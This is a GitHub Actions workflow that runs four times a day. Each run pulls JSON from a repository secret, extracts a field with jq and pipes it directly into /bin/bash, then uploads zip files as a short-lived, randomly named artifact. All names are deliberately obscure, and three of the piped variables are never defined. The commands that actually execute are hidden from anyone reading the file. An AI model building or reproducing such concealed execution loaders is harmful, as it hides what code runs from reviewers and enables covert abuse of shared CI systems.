name: zhengsonglianghe
on:
  workflow_dispatch:

  schedule:
    - cron: '0 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengsonglianghe
        env:
          as88587: ${{ secrets.as88587 }}
        run: |
          printf '%s' "$as88587" | jq -r .s4 | /bin/bash
          echo $mjew00233 | jq -r .ddda9832 | /bin/bash
          echo $ffswh0 | jq -r .mqvy3 | /bin/bash
          printf '%s' "$jybj39" | jq -r .riaa7789 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 6T1RsBjD
          path: "*.zip"
          retention-days: 1
